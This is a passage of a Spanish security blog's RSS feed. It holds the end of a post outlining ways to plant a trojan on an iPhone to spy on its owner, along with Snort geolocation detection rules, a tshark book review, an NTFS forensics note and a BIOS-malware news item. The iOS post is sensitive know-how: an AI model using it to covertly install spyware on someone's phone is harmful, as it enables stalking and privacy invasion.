/&gt;Si se tiene acceso físico al equipo y se conoce el &lt;i&gt;&lt;b&gt;passcode&lt;/b&gt;&lt;/i&gt; o se tiene acceso a un equipo con el que está pareado, entonces se podría instalar fácilmente el troyano con el &lt;i&gt;&lt;b&gt;provisioning profile&lt;/b&gt;&lt;/i&gt; o incluso utilizar la herramienta &lt;a href="http://www.elladodelmal.com/2013/06/recuperar-mensajes-borrados-de-whatsapp.html"&gt;WhatsApp Anti-Delete Protection Tool para monitorizar los mensajes de WhatsApp borrados&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;6.- Sin Jailbreak, sin acceso físico y sin provisioning profile vía App Store:&lt;/b&gt; Aunque parece que meter un malware un la &lt;i&gt;&lt;b&gt;AppStore&lt;/b&gt;&lt;/i&gt; es muy complicado, ya ha habido casos de software malicioso introducido vía &lt;i&gt;&lt;b&gt;AppStore&lt;/b&gt;&lt;/i&gt; como &lt;a href="http://www.seguridadapple.com/2012/07/malware-en-la-app-store-find-and-call.html"&gt;Find &amp;amp; Call&lt;/a&gt;, los r&lt;a href="http://www.seguridadapple.com/2012/06/storm-8-el-primer-escandalo-de-robo-de.html"&gt;obos de datos de los juegos de Storm-8&lt;/a&gt;, o los &lt;a href="http://www.seguridadapple.com/2012/02/twitter-para-ios-envuelto-en-el.html"&gt;comportamientos "maliciosos" de algunas apps como Twitter for iOS&lt;/a&gt; o &lt;a href="http://www.seguridadapple.com/2012/02/path-enviaba-los-contactos-sin.html"&gt;Path&lt;/a&gt;.&amp;nbsp;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-a9gOgo2BBp8/UaTkjT8kM0I/AAAAAAAAQN4/Qm0BjwLOCD4/s1600/Storm8_Games.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-a9gOgo2BBp8/UaTkjT8kM0I/AAAAAAAAQN4/Qm0BjwLOCD4/s1600/Storm8_Games.png" width="470" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;i&gt;Figura 5: Los juegos de Storm 8 que robaban datos&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Además, hemos tenido caso de &lt;a href="http://www.seguridadapple.com/2012/08/el-malware-de-windows-que-se-distribuyo.html"&gt;apps "no maliciosas" que han insertado malware para Windows&lt;/a&gt; o &lt;a href="http://www.seguridadapple.com/2013/05/aparece-una-app-en-la-app-store-con.html"&gt;usado técnicas de descarga de malware&lt;/a&gt;, además de contar con pruebas de concepto como la de &lt;a href="http://www.seguridadapple.com/2011/11/charlie-miller-demuestra-que-la-app.html"&gt;InstaStock de Charly Miller&lt;/a&gt;. Todas ellas pasaron todos los controles de la &lt;i&gt;&lt;b&gt;AppStore&lt;/b&gt;&lt;/i&gt;. Si eres capaz de hacerlo tú, solo deberías convencer al usuario de que se instalase esa &lt;i&gt;&lt;b&gt;app&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Esto es solo un resumen del capítulo del &lt;a href="http://0xword.com/libros/39-libro-hacking-dispositivos-ios-iphone-ipad.html"&gt;Libro de Hacking iOS: iPhone &amp;amp; iPad&lt;/a&gt; que hemos escrito entre muchos profesionales de la seguridad, y que de verdad creo que ha sido uno de los mejores libros publicados por nosotros hasta el momento.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://elladodelmal.com/"&gt;Un informático en el lado del mal&lt;/a&gt; - &lt;a href="https://plus.google.com/102683520044497994270/posts"&gt;Google+&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/ElLadoDelMal"&gt;RSS&lt;/a&gt; &lt;a href="http://www.informatica64.com/"&gt;Informática 64&lt;/a&gt; &lt;a href="http://seguridadapple.com/"&gt;Seguridad Apple&lt;/a&gt;&lt;br /&gt;&lt;a href="http://0xword.com/"&gt;&lt;img src="http://1.bp.blogspot.com/-JhYS6t42nko/UJT-CLSNlpI/AAAAAAAANto/B41xfheH_xo/s1600/L1.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;a href="http://feeds.feedburner.com/~ff/ElLadoDelMal?a=on42u1OZr-w:-5OuriFH9BE:yIl2AUoC8zA"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/ElLadoDelMal?d=yIl2AUoC8zA" /&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ElLadoDelMal?a=on42u1OZr-w:-5OuriFH9BE:-BTjWOF_DHI"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/ElLadoDelMal?i=on42u1OZr-w:-5OuriFH9BE:-BTjWOF_DHI" /&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ElLadoDelMal?a=on42u1OZr-w:-5OuriFH9BE:qj6IDK7rITs"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/ElLadoDelMal?d=qj6IDK7rITs" /&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ElLadoDelMal?a=on42u1OZr-w:-5OuriFH9BE:7Q72WNTAKBA"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/ElLadoDelMal?d=7Q72WNTAKBA" /&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ElLadoDelMal?a=on42u1OZr-w:-5OuriFH9BE:I9og5sOYxJI"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/ElLadoDelMal?d=I9og5sOYxJI" /&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ElLadoDelMal?a=on42u1OZr-w:-5OuriFH9BE:ecdYMiMMAMM"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/ElLadoDelMal?d=ecdYMiMMAMM" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/on42u1OZr-w" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/como-meter-un-troyano-en-ios-y-espiar.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://3.bp.blogspot.com/-l7AqCmD7mh4/UaTavanIhmI/AAAAAAAAQM4/8oip_fwtMEk/s72-c/FlexiSpy.png" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-4237578242416869529</guid><pubDate>Thu, 20 Jun 2013 15:22:00 +0000</pubDate><atom:updated>2013-06-20T10:22:22.499-05:00</atom:updated><title>Snort: Alertas geolocalizadas con flowbits</title><description>&lt;a href="http://www.securityartwork.es/2013/05/28/snort-alertas-geolocalizadas-con-flowbits/"&gt;Snort: Alertas geolocalizadas con flowbits&lt;/a&gt;: &lt;br /&gt;En esta ocasión voy a mostrar un ejemplo que sirva de idea sobre cómo utilizar reglas un poco más complejas en Snort para detectar actividades sospechosas en nuestra red basadas en geolocalización. Para ello, haremos uso de la opción &lt;em&gt;flowbits&lt;/em&gt; en unas determinadas reglas para que salten cuando aparezcan algunos países que consideraremos como hostiles o peligrosos.&lt;br /&gt;Entrando un poco en detalle, deciros que me basaré en el &lt;a href="http://www.securityartwork.es/2011/05/05/preprocesador-de-snort-para-geolocalizacion/"&gt;preprocesador de geolocalización&lt;/a&gt; que desarrolló nuestro compañero Joaquín Moreno (un saludo, Ximo ;)). De esta forma vamos a marcar las conversaciones con países que queramos destacar y activaremos un &lt;em&gt;flowbit&lt;/em&gt;, que luego será comprobado por algunas reglas puntuales.&lt;br /&gt;Para comenzar por la geolocalización podemos empezar por analizar las peticiones DNS realizadas por nuestros equipos hacia dominios de países hostiles:&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;alert udp $HOME_NET any -&amp;gt; $EXTERNAL_NET 53 (msg:”DNS Petición dominio en Islas Caiman”;&lt;br /&gt;flow:to_server; byte_test:1,!&amp;amp;,0xF8,2; content:"|03|ky|00|"; fast_pattern:only;&lt;br /&gt;sid: 3200001; rev:1;)&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Esto podría alertar sobre una situación anómala pero no significa que la comunicación se establezca, ni siquiera si el servidor se encuentra en esa ubicación, aunque podemos utilizarla como un indicio más si contamos con un correlador de alertas. A continuación haremos uso del preprocesador de geolocalización para detectar comunicaciones hacia determinados países:&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;alert tcp $HOME_NET any -&amp;gt; $EXTERNAL_NET $HTTP_PORTS (msg:”S2 GEO Conexión TCP a país&lt;br /&gt;sospechoso”; flow:established,to_server; country: [] -&amp;gt; [KY];&lt;br /&gt;flowbits:set,s2.geo.taxhaven; flowbits:noalert; sid: 3200002; rev:1;)&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Otra forma de geolocalizar, aunque mucho más costosa de mantener, es definir una variable indicando rangos de direcciones IP.&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;ipvar $TAX_HAVEN [63.136.112.0/21, 74.117.112.0/21, 74.117.216.0/21, 74.222.64.0/19,&lt;br /&gt;162.211.136.0/22, 73.225.208.0/20, 192.0.4.0/22, 198.147.208.0/22, 199.201.84.0/22,&lt;br /&gt;208.82.216.0/22, 208.157.144.0/21, 208.168.224.0/19, 209.27.52.0/22, 209.27.60.0/22,&lt;br /&gt;216.144.80.0/20]&lt;br /&gt;&lt;br /&gt;alert tcp $HOME_NET any -&amp;gt; $TAX_HAVEN $HTTP_PORTS (msg:” S2 GEO Conexión TCP a país&lt;br /&gt; sospechoso”; flow:established,to_server; flowbits:set,s2.geo.taxhaven;&lt;br /&gt;flowbits:noalert; sid:3200003; rev:1;)&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;En ambos casos activamos el &lt;em&gt;flowbit&lt;/em&gt; ‘&lt;strong&gt;s2.geo.taxhaven&lt;/strong&gt;‘ y con el parámetro &lt;em&gt;noalert&lt;/em&gt; le indicamos que no genere alerta. Esto no es necesario pero la alerta que nos interesa es la siguiente por lo que no queremos que nos alerte en este caso.&lt;br /&gt;Ahora viene la regla compleja. Utilizaremos una regla que nos avise en caso de que un servidor nos presente un certificado SSL que contenga las palabras &lt;em&gt;“Bank”&lt;/em&gt; o &lt;em&gt;“Cayman Island”&lt;/em&gt;. Previamente, comprueba que el &lt;em&gt;flowbit&lt;/em&gt; ‘&lt;strong&gt;s2.geo.taxhaven&lt;/strong&gt;‘ está activo para esa conversación, es decir, no sólo el servidor dice ser de Islas Caimán sino que la IP está ubicada allí.&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;alert tcp $TAX_HAVEN 443 -&amp;gt; $HOME_NET any (msg:”S2 GEO Certificado SSL de Islas Caimán”;&lt;br /&gt; flow:established,to_client; flowbits:isset,s2.geo.taxhaven; content:“Bank”;&lt;br /&gt;content:“Cayman Island”; sid:3200004; rev:1;)&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Todo esto tan sólo ha sido un ejemplo. Estoy seguro de que podréis adaptar estas reglas a aquellas situaciones en las que queráis añadir geolocalización. Particularmente, yo creo una regla por cada país hostil y utilizo un &lt;em&gt;flowbits&lt;/em&gt; “&lt;strong&gt;badcountry&lt;/strong&gt;”. Por otro lado, creo reglas para que me alerten de descarga de ficheros o conexiones desde IPs críticas a una serie de países hostiles desde el punto de vista de ser fuente de frecuentes ataques de red (&lt;strong&gt;&lt;em&gt;flowbits:isset,s2.geo.badcountry&lt;/em&gt;&lt;/strong&gt;).&lt;br /&gt;&lt;div style="background-color: #fdfbdf; border: 1px solid #aaa; font-size: 10pt; margin: 0px; padding: 10px 35px 10px 35px;"&gt;&lt;br /&gt;&lt;pre&gt;alert tcp $HOME_NET any -&amp;gt; $EXTERNAL_NET $HTTP_PORTS (msg:”S2 GEO Conexión TCP a país&lt;br /&gt;sospechoso (Israel)”; flow:established,to_server; country: [] -&amp;gt; [IL];&lt;br /&gt;flowbits:set,s2.geo.badcountry; flowbits:noalert; sid: 3200021; rev:1;) &lt;/pre&gt;&lt;br /&gt;&lt;pre&gt;alert tcp $HOME_NET any -&amp;gt; $EXTERNAL_NET $HTTP_PORTS (msg:”S2 GEO Conexión TCP a país&lt;br /&gt;sospechoso (Rusia)”; flow:established,to_server; country: [] -&amp;gt; [RU];&lt;br /&gt;flowbits:set,s2.geo.badcountry; flowbits:noalert; sid: 3200022; rev:1;) &lt;/pre&gt;&lt;br /&gt;&lt;pre&gt;alert tcp $HOME_NET any -&amp;gt; $EXTERNAL_NET $HTTP_PORTS (msg:”S2 GEO Conexión TCP a país&lt;br /&gt;sospechoso (Ucrania)”; flow:established,to_server; country: [] -&amp;gt; [UA];&lt;br /&gt;flowbits:set,s2.geo.badcountry; flowbits:noalert; sid: 3200023; rev:1;) &lt;/pre&gt;&lt;br /&gt;&lt;pre&gt;alert tcp $HOME_NET any -&amp;gt; $EXTERNAL_NET $HTTP_PORTS (msg:”S2 GEO Conexión TCP a país&lt;br /&gt;sospechoso (Lituania)”; flow:established,to_server; country: [] -&amp;gt; [LT];&lt;br /&gt;flowbits:set,s2.geo.badcountry; flowbits:noalert; sid: 3200024; rev:1;)&lt;br /&gt;[...]&lt;/pre&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;NOTA: Por cuestión de rendimiento, el orden en el que se comprueba el flowbit es importante, por lo que en comunicaciones TCP se recomienda colocarlo inmediatamente después del parámetro flow. &lt;/em&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/snort-alertas-geolocalizadas-con.html</link><author>noreply@blogger.com (El Bio Gamer)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-5762729485335325317</guid><pubDate>Thu, 20 Jun 2013 15:22:00 +0000</pubDate><atom:updated>2013-06-20T10:22:14.774-05:00</atom:updated><title>Libro: Traffic Analysis with Tshark How-to</title><description>&lt;a href="http://feedproxy.google.com/~r/SecurityArtWork/~3/G3oqXT088-U/"&gt;Libro: Traffic Analysis with Tshark How-to&lt;/a&gt;: &lt;br /&gt;&lt;img src="http://www.securityartwork.es/wp-content/uploads/2013/05/bmerino.png" style="float: left; margin: 0px 30px 10px 0px; width: 250px;" /&gt;El libro que me gustaría comentar ha caído hace pocos días en mis manos y se titula “&lt;em&gt;&lt;a href="http://www.packtpub.com/traffic-analysis-with-tshark/book"&gt;Traffic Analysis with Tshark How-to&lt;/a&gt;&lt;/em&gt;” cuyo autor es nada menos que nuestro compañero del blog Borja Merino (&lt;a href="https://twitter.com/BorjaMerino"&gt;@BorjaMerino&lt;/a&gt;).&lt;br /&gt;Este libro trata, como es evidente, sobre el uso de la herramienta &lt;a href="http://www.wireshark.org/docs/man-pages/tshark.html"&gt;Tshark&lt;/a&gt;, la versión de línea de comandos de Wireshark, y de la que ya hemos hablado en alguna ocasión (&lt;a href="http://www.securityartwork.es/2013/04/29/registro-forense-de-red-con-tshark/"&gt;Registro forense de red con tshark&lt;/a&gt;). Aunque Borja cubre un gran abanico de temas, incluye algunos ejemplos que muestran formas de capturar tráfico, la localización problemas de saturación de red, uso de filtros para buscar evidencias concretas, detectar ataques de red o la utilización de la herramienta como apoyo al hacer &lt;em&gt;fuzzing&lt;/em&gt; a una aplicación. &lt;br /&gt;Se explica de forma atractiva puesto que se presenta en forma de receta y después la explicación de qué estamos haciendo, o como lo titulan en la forma del libro “&lt;em&gt;How to do it&lt;/em&gt;” y “&lt;em&gt;How it works&lt;/em&gt;”. También se etiquetan las secciones por su utilidad e importancia, de la forma “&lt;em&gt;recomendable&lt;/em&gt;”, “&lt;em&gt;imprescindible&lt;/em&gt;” y “&lt;em&gt;conviértete en experto&lt;/em&gt;”, de modo que permite identificar aquellos aspectos por su importancia de cara al grado de utilización de la herramienta que vaya a hacer el usuario.&lt;br /&gt;Eso sí, es necesario leerlo con un equipo y una &lt;em&gt;shell&lt;/em&gt; delante para asimilar toda la información que recoge en tan poco espacio, ya que el material es de alto nivel técnico, con explicaciones prácticas y ejemplos útiles sobre situaciones comunes para cualquier administrador de sistemas, &lt;em&gt;incident handler&lt;/em&gt; o para cualquiera que quiera aprender o mejorar su &lt;em&gt;kung-fu&lt;/em&gt; en tshark.&lt;br /&gt;En definitiva, una lectura totalmente recomendada, a la altura del nivel técnico del autor.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/SecurityArtWork/~4/G3oqXT088-U" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/libro-traffic-analysis-with-tshark-how.html</link><author>noreply@blogger.com (El Bio Gamer)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-409687221969084911</guid><pubDate>Thu, 20 Jun 2013 15:22:00 +0000</pubDate><atom:updated>2013-06-20T10:22:10.342-05:00</atom:updated><title>Tuneles en el sistema de archivos</title><description>&lt;a href="http://conexioninversa.blogspot.com/2013/05/tuneles-en-el-sistema-de-archivos.html"&gt;Tuneles en el sistema de archivos&lt;/a&gt;: &lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/--yudGGaoGP4/UaMe8lqc7bI/AAAAAAAADLI/tmxCew5yTKU/s1600/NTFS+backup.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="150" src="http://3.bp.blogspot.com/--yudGGaoGP4/UaMe8lqc7bI/AAAAAAAADLI/tmxCew5yTKU/s200/NTFS+backup.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;En el último caso forense me encontré con un episodio raro en cuanto al sistema de ficheros. Estaba examinando los metadatos de varios archivos cuando sin querer, eliminé uno de ellos. A continuación lo recuperé del Backup de hace unos días y cuál es mi sorpresa que este nuevo archivo recuperado heredó la fecha de creación del fichero borrado.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Lo ocurrido no me afecto en la investigación pero empecé a recordar que ya había leído algo en otros blogs sobre los túneles de ficheros, en su momento lo tome como una anécdota sin darle importancia, pero que ahora me este pasando esto requería saber que es y qué ocurre.&lt;br /&gt;&lt;br /&gt;Una vez acabado el análisis forense me propuse repetir la operación.&lt;br /&gt;&lt;br /&gt;Para ello vamos a realizar una efectiva &amp;nbsp;prueba de concepto:&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;br /&gt;&lt;li&gt;Creamos un archivo llamado archivo1.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Esperamos uno o dos minutos.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Creamos &amp;nbsp;un archivo llamado archivo2.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Realizamos un DIR /TC. Anotamos las horas de creación.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Cambiamos el nombre archivo1 por el de archivo.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Cambiamos &amp;nbsp;el nombre archivo2 por archivo1.&lt;/li&gt;&lt;br /&gt;&lt;li&gt;Ejecutamos un DIR /TC. Observamos que las horas de creación son idénticas.&lt;/li&gt;&lt;br /&gt;&lt;/ol&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-vTsHjdQE4rw/UaHwMJY06OI/AAAAAAAADK4/V-cNYMoLMAs/s1600/TUNEL.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-vTsHjdQE4rw/UaHwMJY06OI/AAAAAAAADK4/V-cNYMoLMAs/s320/TUNEL.PNG" width="291" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Entonces ¿que está ocurriendo?. Para ello tiré de los colegas y un gran amigo de Microsoft me dio la solución al problema:&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style="color: #999999;"&gt;"Los sistemas Windows conservan metadatos del archivo durante un breve período de tiempo. Esto se produce después de la eliminación o el cambio de nombre.&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style="color: #999999;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style="color: #999999;"&gt;Cuando se quita un nombre de un directorio o fichero, la hora de &amp;nbsp;creación y la pareja de nombres corto/largo se guardan en una caché, teniendo como clave el nombre que se quitó. Cuando se agrega un nombre a un directorio o fichero, se busca en la caché para comprobar si hay información que restaurar. La caché es efectiva y depende del directorio. Si un directorio se elimina, su caché se quita.&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;&lt;span style="color: #999999;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style="color: #999999;"&gt;Windows realiza el túnel en los sistemas de archivos FAT y NTFS para garantizar que los nombres de archivo corto/largo se conserven cuando las aplicaciones de 16 bits realicen esta operación."&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;Es increíble, lo que todavía hereda Windows de sus ancestros como Windows 95&lt;i&gt;. &lt;/i&gt;Evidentemente la siguiente pregunta fue:&lt;br /&gt;&lt;br /&gt;¿Se puede quitar? y su respuesta:&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;&lt;b&gt;&lt;span style="background-color: white; color: #999999;"&gt;"Si, tocando el registro. Mira te voy a pasar un link donde viene explicado todo esto, es el &lt;a href="http://support.microsoft.com/kb/172190"&gt;KB 172190&lt;/a&gt;"&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Efectivamente, una vez leído el KB se llega a la conclusión de que es un mecanismo del funcionamiento del sistema de archivos de Windows y que aunque no perjudica en la investigación forense, es bueno que &amp;nbsp;lo conozcamos.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;NOTA:&lt;/b&gt; Según el KB172190 se puede desactivar el túnel de archivos, lo cual desaconsejo ya que entre otras cosas los accesos directos no podrán ofrecer información &amp;nbsp;de cuando se creó un determinado fichero o programa. Punto a tener en cuenta en nuestro análisis forense.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/tuneles-en-el-sistema-de-archivos.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://3.bp.blogspot.com/--yudGGaoGP4/UaMe8lqc7bI/AAAAAAAADLI/tmxCew5yTKU/s72-c/NTFS+backup.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-3114207385515416963</guid><pubDate>Thu, 20 Jun 2013 15:21:00 +0000</pubDate><atom:updated>2013-06-20T10:21:55.797-05:00</atom:updated><title>Investigadores diseñan malware persistente para la BIOS</title><description>&lt;a href="http://feedproxy.google.com/~r/NoticiasSeguridadInformatica/~3/NTs1uLTpuoI/investigadores-disenan-malware.html"&gt;Investigadores diseñan malware persistente para la BIOS&lt;/a&gt;: Los investigadores esperan lanzar las pruebas de concepto en el próximo Black Hat. Han diseñado un malware que puede infectar la BIOS de forma persistente.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;A medida que más fabricantes de hardware buscan implementar la nueva especificación NIST 800-155 (BIOS Integrity Measurement Guidelines) [PDF] que fue diseñado para hacer que el firmware de la BIOS sea más seguro (sic), puede ser necesario volver a pensar estos supuestos de seguridad de los que depende la norma. Un trío de investigadores...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Contenido completo del post en http://blog.segu-info.com.ar o haciendo clic en el título de la noticia&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;a href="http://feeds.feedburner.com/~ff/NoticiasSeguridadInformatica?a=NTs1uLTpuoI:IG16tpLW1Sw:qj6IDK7rITs"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/NoticiasSeguridadInformatica?d=qj6IDK7rITs" /&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/NoticiasSeguridadInformatica?a=NTs1uLTpuoI:IG16tpLW1Sw:YwkR-u9nhCs"&gt;&lt;img border="0" src="http://feeds.feedburner.com/~ff/NoticiasSeguridadInformatica?d=YwkR-u9nhCs" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/NoticiasSeguridadInformatica/~4/NTs1uLTpuoI" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/investigadores-disenan-malware.html</link><author>noreply@blogger.com (El Bio Gamer)</author><thr:total>0</thr:total></item></channel></rss>